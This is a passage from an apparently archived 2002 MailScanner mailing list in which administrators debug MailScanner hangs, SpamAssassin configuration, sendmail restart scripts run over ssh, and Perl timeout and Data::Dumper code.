>Spam List = spamcop.net, bl.spamcop.net. >Spam List = Infinite-Monkeys, proxies.relays.monkeys.com. >Spam List = osirusoft.com, relays.osirusoft.com. >..................... > >We must be doing something (probably obvious :) wrong. Your help >appreciated. > >Also, we're using Innoculate (eTrust) as our virus protection software. Is >anyone else using it. If so, what is the script we should be running in >place of the Sophos wrapper/shell script when you use Sophos? > >Thank you, >Donna J. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Thu Sep 26 17:01:22 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:47 2006 Subject: bottlenecking? In-Reply-To: <1033050288.29744.176.camel@chaos.entrophy-free.net> References: <5.1.0.14.2.20020926105015.02443c18@imap.ecs.soton.ac.uk> <1032994130.3d923d52c77b2@secure.ecs.soton.ac.uk> <5.1.1.6.0.20020925155955.02077ea8@beloit.edu> <1032994130.3d923d52c77b2@secure.ecs.soton.ac.uk> <5.1.0.14.2.20020926105015.02443c18@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020926165934.02d87c88@imap.ecs.soton.ac.uk> Next time it happens, any chance you could tar up the incoming dir and the mqueue.in dir (the incoming dir is the most useful), and take a look at it off-line some time, to see if there is anything odd in there? Also, a "ps -fel" or "ps auxww" at the time when it is stuck, just saved to a file, would be useful as that might tell us what process is actually hanging up (it might be the virus scanner, it might be MailScanner, it might be the TNEF decoder, all sorts of things). Hopefully this will help me get to the bottom of this one. Jules. At 15:24 26/09/2002, you wrote: >On Thu, 2002-09-26 at 04:56, Julian Field wrote: > > At 03:19 26/09/2002, you wrote: > > > > > > >FWIW: I've seen this sort of problem to one degree or another with every > > >V3 version of MailScanner that I've deployed. Its too soon to say if v4 > > >will have the same sorts of problems. My solution is to use a smart Perl > > >monitor, rather than a shell script, to manage the MailScanner > > >processes. The perl code watches for excessive CPU consumption, > > >excessive process size, or a MailScanner that's run longer than it > > >should. If any of the boundary conditions are seen the offending process > > >is killed and restarted. While I suppose a clever shell script could be > > >written to do the same thing it was very easy to do with Perl and I took > > >the path of least resistance. > > > > It would be interesting to discover what is actually causing the problem, > > as I've never seen it on our systems here at all. Have you checked > > everywhere under /var/spool/MailScanner for "core" files? These can take a > > very long time to scan, and should just be deleted most of the time. If > > many other people were seeing the same problem as you, I would have heard > > about it a lot. And I haven't, so I can only think this is a fairly unusual > > problem. > > >I certainly wouldn't say that it is a common problem or that it happens >at all frequently. I only see it happen at infrequent intervals. I don't >know if the problem is load related or message related, but when it >happens all processing of messages from mqueue.in stops and mail starts >backing up. By the time I'd notice the problem (usually 15 minutes to a >hour later) I might have 10-15K messages in the input queue. At that >point the name of the game is to get the queue cleared and make the >phone stop ringing, so investigative work mostly has to be done in retro >spec. I have looked for core files and not found any. So far, simply >killing the MS process and restarting it causes message processing to >resume. > >For a while I thought that the problem only occurred on my large volume >servers and was leaning towards a load related cause. But I have >observed it (even less frequently) on low volume servers (less that 15k >messages/day). So far I haven't been able to duplicate that failure when >I save off the contents of the mqueue.in dir and run that though my test >jig. That might imply that there's some critical set of conditions that >has to occur to cause MailScanner to go walk-about. One other thing that >I've observed is that MailScanner always has a batch of messages in >process at the time of the failure. The same message ID's exist both in >the work directory and in the input queue. I guess I don't know exactly >what MS was doing at the time it ran off into the weeds, only that it >appeared to have been processing messages. > > > >The V4 implementation brings new challenges. Not only do you have the > > >mater process, but you also have a number of child processes to deal > > >with. I'd like to see a pid file for each of the children, perhaps with > > >a name of the form mailscanner1.pid, mailscanner2.pid, etc. And it would > > >be awfully nice is killing the master process would cause it to reap its > > >children. > > > > I happened to write that for you last night. There are pid files for all of > > the children, and the master creates and destroys these as the children > > start and stop. I've written an init.d script for it (for RedHat) that has > > start, stop, restart, status and reload commands. It does the "reload" > > operation by doing a "kill -HUP" on all the MailScanner processes. > > >Very nice. >-- >The instructions said to use Windows 98 or better, so I installed >RedHat. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From brose at MED.WAYNE.EDU Thu Sep 26 17:12:40 2002 From: brose at MED.WAYNE.EDU (Rose, Bobby) Date: Thu Jan 12 21:15:47 2006 Subject: Spamassasin not working?? Message-ID: Take the line out of your SA local.cf. I don't think it even works anymore because they took out autoreporting because it was generating too many false positives. I'm surprised that you don't see the same thing just running spamassassin unless it's a local user (root) SA config. Mailscanner will use root's home dir for user prefs. -----Original Message----- From: Mark Tavares [mailto:info@pro-invest.ca] Sent: Thursday, September 26, 2002 11:57 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Spamassasin not working?? This is the only fail I see...do I go somewhere with this? debug: Failed to parse line in SpamAssassin configuration, skipping: auto_report_threshold 30 Thanks again.. Mark -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Rose, Bobby Sent: Thursday, September 26, 2002 10:48 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Spamassasin not working?? Do this (only for debugging).. In the sendmail.pl find the SA new object contruct "new Mail::SpamAssassin" and change it new Mail::SpamAssassin({'userprefs_filename' => $Config::SpamAssassinPrefsFile, 'dont_copy_prefs' => 0, 'debug' = > '1'}); The restart mailscanner and this will generate SA debug info on your console. I used this to track down the pyzor, dcc, razor problems that I reported earlier with MS 4.0 and SA 2.50 -----Original Message----- From: Mark Tavares [mailto:info@pro-invest.ca] Sent: Thursday, September 26, 2002 10:31 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Spamassasin not working?? I think my spamassasin/mailscanner combo has stopped working..I have restarted Mailscanner but to no avail. How can I be certain? Or what could I check next? Version 3.22-12 Thanks, Mark From jim at ENTROPHY-FREE.NET Thu Sep 26 18:01:40 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:47 2006 Subject: bottlenecking? In-Reply-To: <5.1.0.14.2.20020926165934.02d87c88@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020926105015.02443c18@imap.ecs.soton.ac.uk> <1032994130.3d923d52c77b2@secure.ecs.soton.ac.uk> <5.1.1.6.0.20020925155955.02077ea8@beloit.edu> <1032994130.3d923d52c77b2@secure.ecs.soton.ac.uk> <5.1.0.14.2.20020926105015.02443c18@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020926165934.02d87c88@imap.ecs.soton.ac.uk> Message-ID: <1033059701.2190.37.camel@wilowisp.dynetics.com> On Thu, 2002-09-26 at 11:01, Julian Field wrote: > Next time it happens, any chance you could tar up the incoming dir and the > mqueue.in dir (the incoming dir is the most useful), and take a look at it > off-line some time, to see if there is anything odd in there? I guess i didn't make it clear... Yes I've examined the contents of mqueue.in (especially those messages in the batch in process) and I don't see anything remarkable. Furthermore, a simple restart takes up where the previous instance failed and those messages already in MS's work dir are processed. In an attempt to duplicate the problem in a more controlled environment I've copied the mqueue.in contents to my test jig and run MS against the entire queue dir as well as using my queue feeder at various rates. So far I haven't managed to duplicate the problem on the test rig. > > Also, a "ps -fel" or "ps auxww" at the time when it is stuck, just saved to > a file, would be useful as that might tell us what process is actually > hanging up (it might be the virus scanner, it might be MailScanner, it > might be the TNEF decoder, all sorts of things). > I have looked the process list, thinking that it might be the virus scanner, but that process wasn't in the list. I'm using Sophos, so I don't need the TNEF decoder (though I have seen it cause problems on installations that required it). When I've used the external TNEF encoder and it causes a hang the only solution that has worked is to take the offending message out of the work queue. At least when that process is the cause the behaviour is completely repeatable. The last two times that I caught this while it was happening I could see the mailscanner process growing in size (apparently without bound) and consuming a lot of CPU. Sort of like it was in some sort of endless loop. What I didn't do, and will if it happens again, is to look at what files the mailscanner process had open and if any of those were changing. -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= The instructions said to use Windows 98 or better, so I installed RedHat Jim Levie email: jim@entrophy-free.net From LISTSERV at JISCMAIL.AC.UK Thu Sep 26 19:28:38 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:47 2006 Subject: MAILSCANNER: E.H.Beekman@AMC.UVA.NL requested to join Message-ID: <200209261828.TAA01129@magpie.ecs.soton.ac.uk> Thu, 26 Sep 2002 19:28:38 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Ewald Beekman . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER E.H.Beekman@AMC.UVA.NL Ewald Beekman The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+E.H.Beekman%40AMC.UVA.NL+Ewald+Beekman&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From adrian at smop.co.uk Thu Sep 26 22:35:00 2002 From: adrian at smop.co.uk (Adrian Bridgett) Date: Thu Jan 12 21:15:47 2006 Subject: SAForkAndTest Message-ID: <20020926213500.GA1396@smop.co.uk> In our current email setup, we just pipe emails through spamassassin using spamd/c. I've configured spamassassin to stick it's report in the headers in English rather than the short names. One small perl tweak later and it now does for all emails rather than just ones with spam in them. In this way we can see what SA checks were triggered and make a decision on possibly raising their associated score. So, I started delving into mailscanner to see how to set this up and came across SAForkAndTest. This function creates a pipe, forks and then runs the tests in the child process, sending the data through the pipe to the parent process. In order to implement a time limit on SA, the parent process is actually in an "eval", with a timer set to a die function which is caught outside the evail. Cute. However I wondered how much overhead all this forking added and so I've ripped it out, moving the tests into the old "parent process" eval code and then removing the redundant fork. On a sample run of 100 calls (over a 10 line email), the time drops from 9.8 seconds to 6.1! (Note, this is just the SAForkandTest code ripped out into a tiny program). On a larger email (600 lines) the time drops from 57.5/59 seconds to 55/57 seconds. Not much, but maybe it's worthwhile investigating. This was on 1.4GHz Athlon, which is probably close enough to your dual 1GHz, so for 20000 this might mean for your 20,000 message benchmark, it would knock 6 or 7 minutes off your 130 minute time which ain't bad. There is a problem with this (I suspect why it was coded this way in the first place), SA appears to leak memory. Going off "SIZE" in top, the perl process grew from around 13000KB to 14000KB by the end of the 100 messages. OTOH with forking, the main process sat at 12000KB, spawning a 12300KB process (as I said before, these were drastically reduced test programs). Back to the original reason I started looking at this, support for english text report in the headers. Currently SAForkandTest prints three results down the pipe which are read at the other end using regexp matches. I'm wondering if these could be done usingq Data::Dumper so that other things can be passed down the pipe if needed. The result could then be eval()ed". This could be used elsewhere (RBLs.pm for instance). Perhaps even a generic wrapper around such functions so that the sysadmin can decide if they want a faster, leaky version or a slower, non-leaky version. One problem I can see is what hapens with an incomplete pipe, but that can be fixed by only using the result if the pipe is closed. The final question is, do you think any of this is worth pursuing or is it all just a waste of time? Cheers Adrian Email: adrian@smop.co.uk Windows NT - Unix in beta-testing. GPG/PGP keys available on public key servers Debian GNU/Linux -*- By professionals for professionals -*- www.debian.org From mailscanner at ecs.soton.ac.uk Thu Sep 26 22:39:47 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:47 2006 Subject: bottlenecking? In-Reply-To: <1033059701.2190.37.camel@wilowisp.dynetics.com> References: <5.1.0.14.2.20020926165934.02d87c88@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020926105015.02443c18@imap.ecs.soton.ac.uk> <1032994130.3d923d52c77b2@secure.ecs.soton.ac.uk> <5.1.1.6.0.20020925155955.02077ea8@beloit.edu> <1032994130.3d923d52c77b2@secure.ecs.soton.ac.uk> <5.1.0.14.2.20020926105015.02443c18@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020926165934.02d87c88@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020926223906.0244a878@imap.ecs.soton.ac.uk> Thanks for helping investigating this. Keep me posted. At 18:01 26/09/2002, you wrote: >On Thu, 2002-09-26 at 11:01, Julian Field wrote: > > Next time it happens, any chance you could tar up the incoming dir and the > > mqueue.in dir (the incoming dir is the most useful), and take a look at it > > off-line some time, to see if there is anything odd in there? > >I guess i didn't make it clear... Yes I've examined the contents of >mqueue.in (especially those messages in the batch in process) and I >don't see anything remarkable. Furthermore, a simple restart takes up >where the previous instance failed and those messages already in MS's >work dir are processed. In an attempt to duplicate the problem in a more >controlled environment I've copied the mqueue.in contents to my test jig >and run MS against the entire queue dir as well as using my queue feeder >at various rates. So far I haven't managed to duplicate the problem on >the test rig. > > > > Also, a "ps -fel" or "ps auxww" at the time when it is stuck, just saved to > > a file, would be useful as that might tell us what process is actually > > hanging up (it might be the virus scanner, it might be MailScanner, it > > might be the TNEF decoder, all sorts of things). > > >I have looked the process list, thinking that it might be the virus >scanner, but that process wasn't in the list. I'm using Sophos, so I >don't need the TNEF decoder (though I have seen it cause problems on >installations that required it). When I've used the external TNEF >encoder and it causes a hang the only solution that has worked is to >take the offending message out of the work queue. At least when that >process is the cause the behaviour is completely repeatable. > >The last two times that I caught this while it was happening I could see >the mailscanner process growing in size (apparently without bound) and >consuming a lot of CPU. Sort of like it was in some sort of endless >loop. What I didn't do, and will if it happens again, is to look at what >files the mailscanner process had open and if any of those were >changing. >-- >=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= >The instructions said to use Windows 98 or better, so I installed RedHat > Jim Levie email: >jim@entrophy-free.net -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From erich at OLYPEN.COM Thu Sep 26 22:42:24 2002 From: erich at OLYPEN.COM (Eric H) Date: Thu Jan 12 21:15:47 2006 Subject: ms won't return from ssh Message-ID: When I run a command like from mymachine: mymachine# ssh myothermachine /usr/local/sbin/restart.sendmail It will run the restart.sendmail script but it won't return back to the prompt, or more importantly the other script which ordinarily calls restart.sendmail. cat /usr/local/sbin/restart.sendmail # stop everything killall -9 sendmail killall -9 mailscanner # start everything # incoming sendmail /usr/sbin/sendmail -bd -ODeliveryMode=queueonly -OQueueDirectory=/var/spool/mqueue.in # outgoing sendmail /usr/sbin/sendmail -q5m # mailscanner #/usr/local/MailScanner/bin/check_mailscanner /usr/local/MailScanner/bin/mailscanner /usr/local/MailScanner/etc/mailscanner.conf However, this returns just fine, which is what I running before implementing mailscanner: #!/bin/bash kill `head -1 /var/run/sendmail.pid` sleep 3 /usr/sbin/sendmail -bd -q5m Any ideas? I'm stumped. It has something to do with mailscanner, not check_mailscanner. Version 3.22-13, btw. Regards, Eric From mailscanner at ecs.soton.ac.uk Thu Sep 26 22:57:06 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:47 2006 Subject: SAForkAndTest In-Reply-To: <20020926213500.GA1396@smop.co.uk> Message-ID: <5.1.0.14.2.20020926224948.03bfba60@imap.ecs.soton.ac.uk> There are 2 mail reasons why I wrap up the SpamAssassin calls inside evals and forks. 1, SA leaks memory like a sieve, as you have found. 2, it doesn't always terminate in reasonable time. When I first wrote support for SA, it was relatively easy for it to hit a regexp that took about 24 hours to evaluate, due to all the back-tracking that was in the regexp. So I *had* to implement timeouts round it, as otherwise it was unusable. I won't release code to people that could fail quite so spectacularly :-) We also had a problem recently when a couple of the RBLs disappeared off the net for a day. This meant that all the DNS lookups for the RBLs was taking a long time as it had to wait for a DNS lookup timeout, which is several seconds. The end result was that our incoming mail flow reduced to a trickle. I wrapped it up in timeouts, and added the "abandon it if n consecutive lookups time out" code, so that it would abandon using a dead RBL if it failed several times in a row. When MailScanner restarts itself a few hours later, these counters are reset and it gives the RBL another chance. So yes, I admit that the resulting code is not as fast as it absolutely could be, but I prefer reliability to a few % of raw speed. You'll never get people using a system which is 5% faster but very unreliable :-) I haven't ever looked at Data::Dumper though. What can it do for me? At 22:35 26/09/2002, you wrote: >So, I started delving into mailscanner to see how to set this up and came >across SAForkAndTest. This function creates a pipe, forks and then runs the >tests in the child process, sending the data through the pipe to the parent >process. In order to implement a time limit on SA, the parent process is >actually in an "eval", with a timer set to a die function which is caught >outside the evail. Cute. > >However I wondered how much overhead all this forking added and so I've >ripped it out, moving the tests into the old "parent process" eval code and >then removing the redundant fork. On a sample run of 100 calls (over a 10 >line email), the time drops from 9.8 seconds to 6.1! (Note, this is just the >SAForkandTest code ripped out into a tiny program). On a larger email (600 >lines) the time drops from 57.5/59 seconds to 55/57 seconds. Not much, but >maybe it's worthwhile investigating. > >This was on 1.4GHz Athlon, which is probably close enough to your dual 1GHz, >so for 20000 this might mean for your 20,000 message benchmark, it would >knock 6 or 7 minutes off your 130 minute time which ain't bad. > >There is a problem with this (I suspect why it was coded this way in the >first place), SA appears to leak memory. Going off "SIZE" in top, the perl >process grew from around 13000KB to 14000KB by the end of the 100 messages. >OTOH with forking, the main process sat at 12000KB, spawning a 12300KB >process (as I said before, these were drastically reduced test programs). > >Back to the original reason I started looking at this, support for english >text report in the headers. Currently SAForkandTest prints three results >down the pipe which are read at the other end using regexp matches. I'm >wondering if these could be done usingq Data::Dumper so that other things >can be passed down the pipe if needed. The result could then be eval()ed". >This could be used elsewhere (RBLs.pm >for instance). Perhaps even a generic wrapper around such functions so that >the sysadmin can decide if they want a faster, leaky version or a slower, >non-leaky version. One problem I can see is what hapens with an incomplete >pipe, but that can be fixed by only using the result if the pipe is closed. > >The final question is, do you think any of this is worth pursuing or is it >all just a waste of time? > >Cheers > >Adrian > >Email: adrian@smop.co.uk >Windows NT - Unix in beta-testing. GPG/PGP keys available on public key >servers >Debian GNU/Linux -*- By professionals for professionals -*- www.debian.org -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From adrian at smop.co.uk Thu Sep 26 23:12:56 2002 From: adrian at smop.co.uk (Adrian Bridgett) Date: Thu Jan 12 21:15:47 2006 Subject: SAForkAndTest In-Reply-To: <5.1.0.14.2.20020926224948.03bfba60@imap.ecs.soton.ac.uk> References: <20020926213500.GA1396@smop.co.uk> <5.1.0.14.2.20020926224948.03bfba60@imap.ecs.soton.ac.uk> Message-ID: <20020926221256.GA3097@smop.co.uk> On Thu, Sep 26, 2002 at 22:57:06 +0100 (+0000), Julian Field wrote: > There are 2 mail reasons why I wrap up the SpamAssassin calls inside evals > and forks. 1, SA leaks memory like a sieve, as you have found. 2, it > doesn't always terminate in reasonable time. When I first wrote support for > SA, it was relatively easy for it to hit a regexp that took about 24 hours > to evaluate, due to all the back-tracking that was in the regexp. So I > *had* to implement timeouts round it, as otherwise it was unusable. I won't > release code to people that could fail quite so spectacularly :-) Why can't you can leave the timeouts in?: $timeout = 2; eval { local $SIG{ALRM} = sub { die "Command Timed Out" }; alarm $timeout; my $spamness = = $Test->check($Mail); $SAHits = $spamness->get_hits(); # sleep 5; $SAReqHits = $spamness->get_required_hits(); $SAHitList = $spamness->get_names_of_tests_hit(); alarm 0; $SAHits = $SAHits + 0.0; $SAReqHits = $SAReqHits + 0.0; }; alarm 0; print $@ if $@; > So yes, I admit that the resulting code is not as fast as it absolutely > could be, but I prefer reliability to a few % of raw speed. You'll never > get people using a system which is 5% faster but very unreliable :-) I'm not normally one to pass up an opportunity to dis windows (think 50% slower in sentence above), but maybe just the once.. > I haven't ever looked at Data::Dumper though. What can it do for me? It will dump perl structures in a way that can be eval()ed: perl -e '%a=("foo"=>"bar","one"=>"two"); use Data::Dumper; print Data::Dumper->Dump([\%a])' prints: $VAR1 = { 'one' => 'two', 'foo' => 'bar' }; I was wondering if this may help pass stuff through pipes - I know ATM you are only passing simple strings, but maybe this would be useful in the future? Adrian Email: adrian@smop.co.uk Windows NT - Unix in beta-testing. GPG/PGP keys available on public key servers Debian GNU/Linux -*- By professionals for professionals -*- www.debian.org From chicks at CHICKS.NET Thu Sep 26 23:14:03 2002 From: chicks at CHICKS.NET (Christopher Hicks) Date: Thu Jan 12 21:15:47 2006 Subject: SAForkAndTest In-Reply-To: <5.1.0.14.2.20020926224948.03bfba60@imap.ecs.soton.ac.uk> Message-ID: On Thu, 26 Sep 2002, Julian Field wrote: > I haven't ever looked at Data::Dumper though. What can it do for me? It really makes nasty data structures easier to debug: [chicks@chicks chicks]$ cat x #!/usr/bin/perl -w use Data::Dumper; my $x = { a => 1, b => 2, c => 3, d => 4, e => [qw(f g h i j k l)], f => { m => 5, n => 6, o => 7, p => 8, q => 9, }, }; print Dumper($x); [chicks@chicks chicks]$ perl x $VAR1 = { 'e' => [ 'f', 'g', 'h', 'i', 'j', 'k', 'l' ], 'f' => { 'm' => 5, 'n' => 6, 'o' => 7, 'p' => 8, 'q' => 9 }, 'a' => 1, 'b' => 2, 'c' => 3, 'd' => 4 }; -- Camels may be nasty beasts, but they're the only way to get through the desert. From randyf at SIBERNET.COM Thu Sep 26 23:21:48 2002 From: randyf at SIBERNET.COM (Randy Fishel) Date: Thu Jan 12 21:15:47 2006 Subject: ms won't return from ssh Message-ID: <200209262221.g8QMLm623639@husky.sibernet.com> Your answer is in what the "-bd" option does in sendmail (or mostly, what will happen if it is missing). rf > > When I run a command like from mymachine: > > mymachine# ssh myothermachine /usr/local/sbin/restart.sendmail > > It will run the restart.sendmail script but it won't return back to > the prompt, or more importantly the other script which ordinarily calls > restart.sendmail. > > cat /usr/local/sbin/restart.sendmail > # stop everything > killall -9 sendmail > killall -9 mailscanner > > # start everything > # incoming sendmail > /usr/sbin/sendmail -bd -ODeliveryMode=queueonly > -OQueueDirectory=/var/spool/mqueue.in > > # outgoing sendmail > /usr/sbin/sendmail -q5m > > # mailscanner > #/usr/local/MailScanner/bin/check_mailscanner > /usr/local/MailScanner/bin/mailscanner /usr/local/MailScanner/etc/mailscanner.conf > > However, this returns just fine, which is what I running before > implementing mailscanner: > > #!/bin/bash > kill `head -1 /var/run/sendmail.pid` > sleep 3 > /usr/sbin/sendmail -bd -q5m > > Any ideas? I'm stumped. It has something to do with mailscanner, not > check_mailscanner. Version 3.22-13, btw. > > Regards, > Eric From erich at OLYPEN.COM Fri Sep 27 00:25:49 2002 From: erich at OLYPEN.COM (Eric H) Date: Thu Jan 12 21:15:47 2006 Subject: ms won't return from ssh In-Reply-To: <200209262221.g8QMLm623639@husky.sibernet.com> Message-ID: On Thu, 26 Sep 2002, Randy Fishel wrote: > Your answer is in what the "-bd" option does in sendmail (or mostly, > what will happen if it is missing). Hmm, I was just copying what /etc/rc.d/init.d/mailscanner does, but you are right, the -bd option isn't there: echo -n ' outgoing sendmail: ' /usr/sbin/sendmail $([ -n "$QUEUETIME" ] && echo -q$QUEUETIME) Nonetheless, it still didn't help when I added -bd to the outgoing sendmail in my script. Something else caught my attention though, while waiting for it to exit to hopefully maybe see an error or something helpful, I got this: mymachine# ssh myothermachine /usr/local/sbin/restart.sendmail >>> Virus 'W32/Hybris-C' found in file ./g8QLfBPu015603/joke.exe >>> Virus 'W32/Hybris-C' found in file ./g8QLfBPu015604/midgets.scr Killed by signal 2. So, it looks like it might be some sort of console fishiness, like something isn't wanting to give it up and the noise that Sophos makes comes through. Someone mentioned, ah, here it is: >Date: Fri, 13 Sep 2002 10:13:33 +0800 >From: Ruel C. Bristol >Reply-To: MailScanner mailing list >To: MAILSCANNER@JISCMAIL.AC.UK >Subject: Re: what's this VC noise? >Edit sweep.pl and add "-nc" on the DisinfectionOptions of sophos. This >will invert the default setting of sophos to ask for confirmation before >disinfecting/deleting. But I just added -nc and no joy. This is probably something simple and stupid, like always. Eric From mailscanner at ecs.soton.ac.uk Fri Sep 27 00:54:41 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:47 2006 Subject: ms won't return from ssh In-Reply-To: References: <200209262221.g8QMLm623639@husky.sibernet.com> Message-ID: <5.1.0.14.2.20020927005219.037a4150@imap.ecs.soton.ac.uk> The "-bd" tells sendmail you want it to provide the SMTP service on port 25. It doesn't actually have anything to do with it becoming a daemon. A sendmail started with just "sendmail -q15m" will daemonise itself. At 00:25 27/09/2002, you wrote: >On Thu, 26 Sep 2002, Randy Fishel wrote: > > > Your answer is in what the "-bd" option does in sendmail (or mostly, > > what will happen if it is missing). > >Hmm, I was just copying what /etc/rc.d/init.d/mailscanner does, but >you are right, the -bd option isn't there: > > echo -n ' outgoing sendmail: ' > /usr/sbin/sendmail $([ -n "$QUEUETIME" ] && echo -q$QUEUETIME) > >Nonetheless, it still didn't help when I added -bd to the outgoing >sendmail in my script. > >Something else caught my attention though, while waiting for it to >exit to hopefully maybe see an error or something helpful, I got >this: > >mymachine# ssh myothermachine /usr/local/sbin/restart.sendmail > >>> Virus 'W32/Hybris-C' found in file ./g8QLfBPu015603/joke.exe > >>> Virus 'W32/Hybris-C' found in file ./g8QLfBPu015604/midgets.scr >Killed by signal 2. > >So, it looks like it might be some sort of console fishiness, like >something isn't wanting to give it up and the noise that Sophos >makes comes through. Someone mentioned, ah, here it is: > > >Date: Fri, 13 Sep 2002 10:13:33 +0800 > >From: Ruel C. Bristol > >Reply-To: MailScanner mailing list > >To: MAILSCANNER@JISCMAIL.AC.UK > >Subject: Re: what's this VC noise? > > >Edit sweep.pl and add "-nc" on the DisinfectionOptions of sophos. This > >will invert the default setting of sophos to ask for confirmation before > >disinfecting/deleting. > >But I just added -nc and no joy. This is probably something simple and >stupid, like always. > >Eric -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From erich at OLYPEN.COM Fri Sep 27 01:19:51 2002 From: erich at OLYPEN.COM (Eric H) Date: Thu Jan 12 21:15:47 2006 Subject: ms won't return from ssh In-Reply-To: <5.1.0.14.2.20020927005219.037a4150@imap.ecs.soton.ac.uk> Message-ID: On Fri, 27 Sep 2002, Julian Field wrote: > The "-bd" tells sendmail you want it to provide the SMTP service on port > 25. It doesn't actually have anything to do with it becoming a daemon. A > sendmail started with just "sendmail -q15m" will daemonise itself. Which is why you didn't have "-bd" in the init script, yes of course. So, here's what's going on: mymachine]# ssh myothermachine /etc/rc.d/rc3.d/S80mailscanner restart Shutting down MailScanner daemons: MailScanner: [ OK ] incoming sendmail: [ OK ] outgoing sendmail: [ OK ] Starting MailScanner daemons: incoming sendmail: [ OK ] outgoing sendmail: [ OK ] MailScanner: [ OK ] Killed by signal 2. mymachine# ssh myothermachine /etc/rc.d/rc3.d/S30syslog restart Shutting down kernel logger: [ OK ] Shutting down system logger: [ OK ] Starting system logger: [ OK ] Starting kernel logger: [ OK ] mymachine# I have to hit ctrl C to get the mailscanner init script to exit. Eric From jim at ENTROPHY-FREE.NET Fri Sep 27 01:15:27 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:47 2006 Subject: ms won't return from ssh In-Reply-To: References: Message-ID: <1033085728.30611.6.camel@chaos.entrophy-free.net> On Thu, 2002-09-26 at 16:42, Eric H wrote: > When I run a command like from mymachine: > > mymachine# ssh myothermachine /usr/local/sbin/restart.sendmail > > It will run the restart.sendmail script but it won't return back to > the prompt, or more importantly the other script which ordinarily calls > restart.sendmail. > > cat /usr/local/sbin/restart.sendmail > # stop everything > killall -9 sendmail > killall -9 mailscanner > > # start everything > # incoming sendmail > /usr/sbin/sendmail -bd -ODeliveryMode=queueonly > -OQueueDirectory=/var/spool/mqueue.in > > # outgoing sendmail > /usr/sbin/sendmail -q5m > > # mailscanner > #/usr/local/MailScanner/bin/check_mailscanner > /usr/local/MailScanner/bin/mailscanner /usr/local/MailScanner/etc/mailscanner.conf > > However, this returns just fine, which is what I running before > implementing mailscanner: > > #!/bin/bash > kill `head -1 /var/run/sendmail.pid` > sleep 3 > /usr/sbin/sendmail -bd -q5m > > Any ideas? I'm stumped. It has something to do with mailscanner, not > check_mailscanner. Version 3.22-13, btw. > I believe the problem lies in the way Perl handles STDIN/STDOUT/STDERR. Basically that it needs a controlling terminal to operate. I've played around with it a bit and I can get a perl program to not hang an ssh command when launched, but the process then exits instead of continuing to run. Essentially I wrote a small program that would daemonize itself, like MailScanner, to investigate what was happening. The only thing that I can say is not to try to do it via an ssh command. You can accomplish what you want by having the script just kill MailScanner and allow check_mailscanner to fire it back from cron. To reduce the delay invoke check_mailscanner once a minute from cron. -- The instructions said to use Windows 98 or better, so I installed RedHat. From randyf at SIBERNET.COM Fri Sep 27 01:46:32 2002 From: randyf at SIBERNET.COM (Randy Fishel) Date: Thu Jan 12 21:15:47 2006 Subject: ms won't return from ssh In-Reply-To: <5.1.0.14.2.20020927005219.037a4150@imap.ecs.soton.ac.uk> Message-ID: Well, I'll be... You are right. All these years of asserting -bd with -q (yet many startup scripts still do it). rf On Fri, 27 Sep 2002, Julian Field wrote: > The "-bd" tells sendmail you want it to provide the SMTP service on port > 25. It doesn't actually have anything to do with it becoming a daemon. A > sendmail started with just "sendmail -q15m" will daemonise itself. > > At 00:25 27/09/2002, you wrote: > >On Thu, 26 Sep 2002, Randy Fishel wrote: > > > > > Your answer is in what the "-bd" option does in sendmail (or mostly, > > > what will happen if it is missing). > > From glynn at MAKATI.TECHSQUARE.COM Fri Sep 27 05:21:06 2002 From: glynn at MAKATI.TECHSQUARE.COM (Glynn S. Condez) Date: Thu Jan 12 21:15:47 2006 Subject: clean_quarantine script Message-ID: <019001c265dd$4d0c6170$8201a8c0@proaccessph.com> Hi, I'd like to clarify if the clean_quarantine script holds the data 9 days from the present time? thats what I observed. --- Glynn --- From a.phillips at MET.NO Fri Sep 27 06:57:04 2002 From: a.phillips at MET.NO (Adrian Phillips) Date: Thu Jan 12 